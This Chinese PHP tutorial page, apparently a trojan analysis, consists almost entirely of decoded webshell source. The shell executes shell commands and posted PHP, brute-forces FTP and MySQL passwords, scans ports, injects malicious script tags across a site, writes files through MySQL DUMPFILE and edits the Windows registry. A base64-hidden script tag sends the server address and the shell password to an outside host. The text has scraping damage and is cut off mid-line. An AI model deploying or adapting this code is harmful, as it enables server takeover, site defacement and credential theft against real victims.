Home >Backend Development >PHP Tutorial >php 木马的分析(加密破解)_PHP
分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。
解码解压缩代码如下:
复制代码 代码如下:
<?php function writetofile($filename, $data) { //File Writing $filenum=@fopen($filename,"w"); if (!$filenum) { return false; } flock($filenum,LOCK_EX); $file_data=fwrite($filenum,$data); fclose($filenum); return true; } ?>
然后在php的环境下进行运行,会得到php明文文件如下:
复制代码 代码如下:
error_reporting(7); ob_start(); $mtime = explode(' ', microtime()); $starttime = $mtime[1] + $mtime[0]; @set_time_limit(0); //非安全模式可以使用上面的函数,超时取消。 /*===================== 程序配置 =====================*/ // 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效 $admin['check'] = "1"; // 如果需要密码验证,请修改登陆密码 //默认端口表 $hidden = "44997"; $admin['port'] = "80,139,21,3389,3306,43958,1433,5631"; //跳转用的秒 $admin['jumpsecond'] = "1"; //Ftp破解用的连接端口 $alexa = "yes"; //是否显示alexa排名,yes或是no $admin['ftpport'] = "21"; // 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no) $retime = "no"; // 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定) $cmd = "cmd.exe"; // 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~ /*===================== 配置结束 =====================*/ $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $serverp = $admin['pass']; $copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9'); $copyurll = base64_decode('Jz48L3NjcmlwdD4='); $onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);} $self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions"); /*===================== 身份验证 =====================*/ if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "<span style="\" style="\""font-size: 12px; font-family: Verdana\">注销成功......<p><a href="\" href="\""".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>";exit;} if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}} /*===================== 验证结束 =====================*/ // 判断 magic_quotes_gpc 状态 if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);} //mix.dll的代码 $mixdll = "7Zt/TBNnGMfflrqBFnaesBmyZMcCxs2k46pumo2IQjc3wSEgUKYthV6hDAocV6dDF5aum82FRBaIHoRlRl0y3Bb/cIkumnVixOIE/cMMF+ePxW1Ixah1yLBwe+5aHMa5JcsWs+T5JE+f9/m+z/u8z73HP9cruaXbSAwhRAcmy4QcIBEyyd8zCJbw1FcJZH/cyZQDmpyTKYVVzkamnq+r5G21TIXN5aoTmHKO4d0uxulisl8vYGrr7JwhPn5marTG4ozM3oZ1hrYpk7JS2wR1/Fzb2+DnZGWosZSV1lav+mfbePD5zooqJf9BveWZCMnR6Ah/MmfFlHaRJKTM0jxCCAVBekQbmE0iMaOGlDqmIuehiZ5LpGA0D9BGUyMxdVdXy6YQskXxTGTJA8kkJPuv5h8Ec7f1P8UgcBsF8B9qow1N2b0lygy83SbYCPlcExGmncH0FjMNkTRyVMlLJ/ec3bQ8v4HnauoqCKmJCmpe5n15KwiCIAiCIAiCIAjyUBCzU2PFTJ1nCRGM4kqdNyAsKCr+eitLKE9AXui/+cXt0wt+26cRT4u3xc2pid9c0Yb2iH2eSzGh3VZLD6zWHSOa3sxYBmoZ/T3berbdy1rx6rtXd8PDY0FRsWjSiytjxdm+9nWTshyN1ujy5SRYTnmO6nymMc9hZY64Z4qmuVB5oT9YKeZSvtxbLe12mMiv0sKD7ZAddnOIprG8oUIYpSlfXCyWJNB83jKldItSZM0QS1RdknymsENsV6YcvqSxdEKJpvCuCfAtMyj4lC+KpltWyxviT+t7vpXT5kM3clqq+snAp3JGXr87YemMfXAu7xjkeMWL8XOVrsc0Ypwvfj8I7mVVzbChnJQIutdv3nVIEXVwCQ4PQ3YqUZUOdquC52dq1wEIh4aVfLWq2RzMgD2Wqmlev5AuxisZRS0N4Rev87SYAHfmUfm0Ou25pgsO58lJemX/NEUhZku1puSInsBxF4jrY4tEt75Y3EJ5R91xngylPgnO80xqhBmeSa376Z3+yCZxxUUF8ikY6GEwlCTLMrSgNLxaiQugOVjjM+ndetBfKM4rGLoBR+gdVcrEuOcpSRcn1UUxKSa9Z4ueCLOnaseqtWEx3Gc42vXQnJxGKR1vTo3VuOd4MpREuNGykKqTkwjMRC4BQRAEQRAEQRAE+S+YZCL+EPhTYINgl8GuRfVGQprjwGaBKfHHzB9r98EYno/J1mnaURgrXwY0T9OSU8h975b/6f7FBUbrQqPBXlNDSIbWJtQ5CcktKMrKL4xoFq2D5zhCHtNYnS6nIHB8LWnV1tpq1LfTXcRqs1e7GwWrw+7cQMh6ku1stJXXcIVVPGez5zjLeRu/KQuyG8kqU/5qU87UXtOZ+k3BhpTIbwRiolYCsR2sHqyMIiQPTHkP3gyxCNalnAOs0JJc89rsl9XCuc6NFXUuF1chTBta7ZzS/HRFjREEQRAEQRAEQRDkXyJIlb62MOA4aNU0L5op/TgenDEUlGW5vkySpJ6JJZ+Co8+201e8i+izrfRyengPPfLBpY5q+peDHeX0dy3dwkD/cfoTGL8Z2u6vXjbS6j+WbOk611TvP9ZLF9IXDneUrtzYUdKdJ9Ot9AVvR2nJxs6OElrqKKUraFeydTv9aqjD3zACGyVb204MOPq5Hnq5Io0pkvsHujbk81NdTzSVB4DQjlCno7+WXk717qR691C9Z2XLhS937Eg87wsMdJvVjEAgsX+PpXP81oR0IuDob7B81ClJn1nOd/0sSTtCvv4+R78NjIM5d7d58ZPmq2XHTwz0OVb1+I1Nb3WbSxs6HQ7H+fBIIDg6PjgxEQwPD0vfB8NjI2FFgWhQOnfp+sjJG6BNSGdGxybOXL8THAteHJSuDe891r1X6u8b7BsdvxkeGZTGR2/fDo+PSOO/jg6Hh1VRIqSkpGT+MwzPNbidPNfI2JhGgXe6Khmbyw7GOF0CV8nxD/uvA0EQBEEQBEEQBPnfQkX+D/3x9PfTQ+l30jVsIpvMMqyBfZ59iX2FLWTXsdVsHSuwm9j32Fa2k93HHmKPsJfZUTbf6DI2GbcaH/YlIAiCIAiCIAiCIAjy1/wO"; function shelL($command){ global $windows,$disablefunctions; $exec = '';$output= ''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} return $exec; } // 查看PHPINFO if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";exit; }if($_GET['action'] == "nowuser") {$user = get_current_user(); if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!"; echo"当前进程用户名:$user"; exit; } if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit; } if($action=="mysqldown"){ $link=@mysql_connect($host,$user,$password); if (!$link) { $downtmp = '数据库连接失败: ' . mysql_error(); }else{ $query="select load_file('".$filename."');"; $result = @mysql_query($query, $link); if(!$result){ $downtmp = "读取失败,可能是文件不存在或是没file权限。<br>".mysql_error(); }else{ while ($row = mysql_fetch_array($result)) { $filename = basename($filename); if($rardown=="yes"){ $zip = NEW Zip; $zipfiles[]=Array("$filename",$row[0]); $zip->Add($zipfiles,1); $code = $zip->get_file(); $filename = "".$filename.".rar"; }else{ $code = $row[0]; } header("Content-type: application/octet-stream"); header("Accept-Ranges: bytes"); header("Accept-Length: ".strlen($code)); header("Content-Disposition: attachment;filename=$filename"); echo($code); exit; } } } } // 在线代理 if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style="\" style="\""font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";exit; } // 下载文件 if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script type="text/javascript"><!-- alert('你要下的文件不存在!') // --></script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;} } // 直接下载备份数据库 if ($_POST['backuptype'] == 'download') { @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); @mysql_select_db($dbname) or die("选择数据库失败"); $table = array_flip($_POST['table']); $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "出错: ".mysql_error(); $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata.= sqldumptable($currow[0]); $mysqldata.= $mysqldata."\r\n"; } } mysql_close(); exit; } // 程序目录 $pathname=str_replace('\\','/',dirname(__FILE__)); $dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]); // 获取当前路径 if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_GET['dir']; $nowpath = getPath($pathname, $dir); } // 判断读写情况 $dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href="\" href="\""?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href="\" href="\""?action=reg\">注册表操作</a>" : ""; $tb = new FORMS; ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <style type="text/css"><!-- body,td{font-size: 12px;background-color:#000000;color:#eee; margin: 1px;margin-left:1px; SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF; SCROLLBAR-TRACK-COLOR: #383838;} a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000} .smlfont { font-family: "Verdana", "Tahoma", "宋体"; font-size: "11px"; } .INPUT { FONT-SIZE: "12px"; COLOR: "#000000"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; padding-left: "2px"; } .redfont {COLOR: "#CA0000";} .top {BACKGROUND-COLOR: "#CCCCCC"} .firstalt {BACKGROUND-COLOR: "#EFEFEF"} .secondalt {BACKGROUND-COLOR: "#F5F5F5"} --></style><style type="text/css" bogus="1">body,td{font-size: 12px;background-color:#000000;color:#eee; margin: 1px;margin-left:1px; SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF; SCROLLBAR-TRACK-COLOR: #383838;} a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000} .smlfont { font-family: "Verdana", "Tahoma", "宋体"; font-size: "11px"; } .INPUT { FONT-SIZE: "12px"; COLOR: "#000000"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; padding-left: "2px"; } .redfont {COLOR: "#CA0000";} .top {BACKGROUND-COLOR: "#CCCCCC"} .firstalt {BACKGROUND-COLOR: "#EFEFEF"} .secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style> <SCRIPT language=JavaScript> function CheckAll(form) { for (var i=0;i<form.elements.length;i++) { var e = form.elements[i]; if (e.name != 'chkall') e.checked = form.chkall.checked; }} function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}} </SCRIPT> </head> <title><?php echo"$myneme"?></title> <body style="table-layout:fixed; word-break:break-all onmouseover=" style="table-layout:fixed; word-break:break-all onmouseover="window.status='设计:幽月 仅限于网站管理员安全检测用,请务使用于非法用途,后果作者概不负责';return true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)"> <center> <?php //$_SERVER["DOCUMENT_ROOT"] $tb->tableheader(); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top'); $tb->tdbody('<a href="?dir='.$dirpath.'" href="?dir='.$dirpath.'">根目录</a> | <a href="?action=dir" href="?action=dir">Shell目录</a> | <a href="?action=phpenv" href="?action=phpenv">环境变量</a> | <a href="?action=proxy" href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell" href="?action=shell">WebShell</a> | <a href="?action=crack" href="?action=crack">杂项破解</a> | <a href="?action=mix" href="?action=mix">解压mix.dll</a> | <a href="?action=logout" href="?action=logout">注销登录</a>'); $tb->tdbody('<a href="?action=plgm" href="?action=plgm">批量挂马</a> | <a href="?action=downloads" href="?action=downloads">Http文件下载</a> | <a href="?action=search&dir='.$dir.'" href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval" href="?action=eval">执行php脚本</a> | <a href="?action=sql" href="?action=sql">执行SQL语句</a> | <a href="?action=mysqlfun" href="?action=mysqlfun">Func反弹Shell</a> | <a href="?action=sqlbak" href="?action=sqlbak">MySQL备份</a> | <a href="?action=SUExp" href="?action=SUExp">Serv-U提权</a>'); $tb->tablefooter(); ?> <hr width="775" noshade> <table width="775" border="0" cellpadding="0"> <? $tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗')); $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); $tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit'))); $tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit'))); ?> </table> <hr width="775" noshade> <?php /*===================== 执行操作 开始 =====================*/ echo "<p><b>\n"; // 删除文件 if (!empty($delfile)) { if (file_exists($delfile)) { echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; } else { echo basename($delfile)." 文件已不存在!"; } } // 删除目录 elseif (!empty($deldir)) { $deldirs="$dir/$deldir"; if (!file_exists("$deldirs")) { echo "$deldir 目录已不存在!"; } else { echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!"; } } // 创建目录 elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { if (!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if (file_exists("$mkdirs")) { echo "该目录已存在!"; } else { echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!"; @chmod("$mkdirs",0777); } } } // 上传文件 elseif ($doupfile) { echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!"; } elseif($action=="mysqlup"){ $filename = $_FILES['upfile']['tmp_name']; if(!$filename) { echo"没有选择要上传的文件。。"; }else{ $shell = file_get_contents($filename); $mysql = bin2hex($shell); if(!$upname) $upname = $_FILES['upfile']['name']; $shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';"; $link=@mysql_connect($host,$user,$password); if(!$link){ echo "登陆失败".mysql_error(); }else{ $result = mysql_query($shell, $link); if($result){ echo"操作成功.文件成功上传到".$host.",文件名为".$uppath."/".$upname.".."; }else{ echo"上传失败 原因:".mysql_error(); } } } } elseif($action=="mysqldown"){ if(!empty($downtmp)) echo $downtmp; } // 编辑文件 elseif ($_POST['do'] == 'doeditfile') { if (!empty($_POST['editfilename'])) { if(!file_exists($editfilename)) unset($retime); if($time==$now) $time = @filemtime($editfilename); $time2 = @date("Y-m-d H:i:s",$time); $filename="$editfilename"; @$fp=fopen("$filename","w"); if($_POST['change']=="yes"){ $filecontent = "?".">".$_POST['filecontent']."<?"; $filecontent = gzdeflate($filecontent); $filecontent = base64_encode($filecontent); $filecontent = "<?php\n/*\n代码由浅蓝的辐射鱼加密!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>"; }else{ $filecontent = $_POST['filecontent']; } echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!"; @fclose($fp); if($retime=="yes"){ echo" 鱼鱼自动操作:"; echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!"; } } else { echo "请输入想要编辑的文件名!"; } } //文件下载 elseif ($_POST['do'] == 'downloads') { $contents = @file_get_contents($_POST['durl']); if(!$contents){ echo"无法读取要下载的数据"; } elseif(file_exists($path)){ echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。"; }else{ $fp = @fopen($path,"w"); echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!"; @fclose($fp); } } elseif($_POST['action']=="mix"){ if(!file_exists($_POST['mixto'])){ $tmp = base64_decode($mixdll); $tmp = gzinflate($tmp); $fp = fopen($_POST['mixto'],"w"); echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吧?!"; fclose($fp); }else{ echo"不是吧?".$_POST['mixto']."已经存在了耶~"; } } // 编辑文件属性 elseif ($_POST['do'] == 'editfileperm') { if (!empty($_POST['fileperm'])) { $fileperm=base_convert($_POST['fileperm'],8,10); echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!"; echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); } else { echo "请输入想要设置的属性!"; } } // 文件改名 elseif ($_POST['do'] == 'rename') { if (!empty($_POST['newname'])) { $newname=$_POST['dir']."/".$_POST['newname']; if (@file_exists($newname)) { echo "".$_POST['newname']." 已经存在,请重新输入一个!"; } else { echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!"; } } else { echo "请输入想要改的文件名!"; } } elseif ($_POST['do'] == 'search') { if(!empty($oldkey)){ echo"<span class=\"redfont\">查找关键词:[".$oldkey."],下面显示查找的结果:"; if($type2 == "getpath"){ echo"鼠标移到结果文件上会有部分截取显示."; } echo"</span><br><hr width=\"775\" noshade>"; find($path); }else{ echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?"; } } elseif ($_GET['action']=='plgmok') { dirtree($_POST['dir'],$_POST['mm']); } elseif ($_GET['action'] == "plgm") { $action = '?action=plgmok'; $gm = "<script src="http://127.0.0.1" src="http://127.0.0.1"></script>"; $tb->tableheader(); $tb->formheader($action,'批量挂马'); $tb->tdbody('网站批量挂马程序php版','center'); $tb->tdbody('文件位置: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>要挂代码:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','批量挂马').'<br>'.$tb->makeinput('submit','开始挂马','','submit'),'center','1','35'); echo "</form>"; $tb->tablefooter(); }//end plgm // 克隆时间 elseif ($_POST['do'] == 'domodtime') { if (!@file_exists($_POST['curfile'])) { echo "要修改的文件不存在!"; } else { if (!@file_exists($_POST['tarfile'])) { echo "要参照的文件不存在!"; } else { $time=@filemtime($_POST['tarfile']); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; } } } // 自定义时间 elseif ($_POST['do'] == 'modmytime') { if (!@file_exists($_POST['curfile'])) { echo "要修改的文件不存在!"; } else { $year=$_POST['year']; $month=$_POST['month']; $data=$_POST['data']; $hour=$_POST['hour']; $minute=$_POST['minute']; $second=$_POST['second']; if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { $time=strtotime("$data $month $year $hour:$minute:$second"); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; } } } elseif($do =='port'){ $tmp = explode(",",$port); $count = count($tmp); for($i=$first;$i<$count;$i++){ $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>"; } } /* 这里代码写得很杂,说实话我自己都不知道写了什么。 好在能用,我就没管了,假设有人看到干脆重写吧。*/ elseif ($do == 'crack') {//反正注册为全局变量了。 if(@file_exists($passfile)){ $tmp = file($passfile); $count = count($tmp); if(empty($onetime)){ $onetime = $count; $turn="1"; }else{ $nowturn = $turn+1; $now = $turn*$onetime; $tt = intval(($count/$onetime)+1); } if($turn>$tt or $onetime>$count){ echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。"; }else{ $first = $onetime*($turn-1); for($i=$first;$i<$now;$i++){ if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i])); else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i])); if($sa) { $t = "获取".$user."的密码为".$tmp[$i].""; } } if(!$t){ echo "<meta http-equiv=\"refresh\" content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span style="\" style="\""font-size: 12px; font-family: Verdana\"><a href="\" href="\""".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\">字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探. >>></a><br>全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。</span>"; } else { echo"$t"; } } }else{ echo"字典文件不存在,请确定。"; } } elseif($do =='port'){ if(!eregi("-",$port)){ $tmp = explode(",",$port); $count = count($tmp); $first = "1"; }else{ $tmp = explode("-",$port); $first = $tmp[0]; $count = $tmp[1]; } for($i=$first;$i<$count;$i++){ if(!eregi("-",$port)){ $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>"; }else{ $fp = @fsockopen($host, $i, $errno, $errstr, 1); if($fp) echo"发现".$host."主机打开了端口".$i."<br>"; } } } // 连接MYSQL elseif ($connect) { if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { echo "数据库连接成功!"; mysql_close(); } else { echo mysql_error(); } } // 执行SQL语句 elseif ($_POST['do'] == 'query') { @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); @mysql_select_db($dbname) or die("选择数据库失败"); $result = @mysql_query($_POST['sql_query']); echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error(); mysql_close(); } // 备份操作 elseif ($_POST['do'] == 'backupmysql') { if (empty($_POST['table']) OR empty($_POST['backuptype'])) { echo "请选择欲备份的数据表和备份方式!"; } else { if ($_POST['backuptype'] == 'server') { @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); @mysql_select_db($dbname) or die("选择数据库失败"); $table = array_flip($_POST['table']); $filehandle = @fopen($path,"w"); if ($filehandle) { $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "出错: ".mysql_error(); while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $filehandle); fwrite($filehandle,"\n\n\n"); } } fclose($filehandle); echo "数据库已成功备份到 <a href="\" href="\""".$path."\" target=\"_blank\">".$path."</a>"; mysql_close(); } else { echo "备份失败,请确认目标文件夹是否具有可写权限!"; } } } } elseif($downrar) { if (!empty($dl)) { if(eregi("unzipto:",$localfile)){ $path = "".$dir."/".str_replace("unzipto:","",$localfile).""; $zip = new Zip; $zipfile=$dir."/".$dl[0]; $array=$zip->get_list($zipfile); $count=count($array); $f=0; $d=0; for($i=0;$i<$count;$i++) { if($array[$i][folder]==0) { if($zip->Extract($zipfile,$path,$i)>0) $f++; } else $d++; } if($i==$f+$d) echo "$dl[0] 解压到".$path."成功<br>($f 个文件 $d 个目录)"; elseif($f==0) echo "$dl[0] 解压到".$path."失败"; else echo "$dl[0] 未解压完整<br>(已解压 $f 个文件 $d 个目录)"; }else{ $zipfile=""; $zip = new Zip; for($k=0;isset($dl[$k]);$k++) { $zipfile=$dir."/".$dl[$k]; if(is_dir($zipfile)) { unset($zipfilearray); addziparray($dl[$k]); for($i=0;$zipfilearray[$i];$i++) { $filename=$zipfilearray[$i]; $filesize=@filesize($dir."/".$zipfilearray[$i]); $fp=@fopen($dir."/".$filename,rb); $zipfiles[]=Array($filename,@fread($fp,$filesize)); @fclose($fp); } } else { $filename=$dl[$k]; $filesize=@filesize($zipfile); $fp=@fopen($zipfile,rb); $zipfiles[]=Array($filename,@fread($fp,$filesize)); @fclose($fp); } } $zip->Add($zipfiles,1); $code = $zip->get_file(); $ck = "_QQ44997_".date("Y-m-d",time()).""; if(empty($localfile)){ header("Content-type: application/octet-stream"); header("Accept-Ranges: bytes"); header("Accept-Length: ".strlen($code)); header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip"); echo $code; exit; }else{ $fp = @fopen("".$dir."/".$localfile."","w"); echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!"; @fclose($fp); } } } else { echo "请选择要打包下载的文件!"; } } // Shell.Application 运行程序 elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!"; } // 查看PHP配置参数状况 elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname']).""; } // 读取注册表 elseif(($regread) AND !empty($_POST['readregname'])) { $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); var_dump(@$shell->RegRead($_POST['readregname'])); } // 写入注册表 elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!"; } // 删除注册表 elseif(($regdelete) AND !empty($_POST['delregname'])) { $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); $a = @$shell->RegDelete($_POST['delregname']); echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!"; } else { echo "$notice"; echo "<a href="\" href="\""?dir=C:/Program%20Files/\">Program</a> | <a href="\" 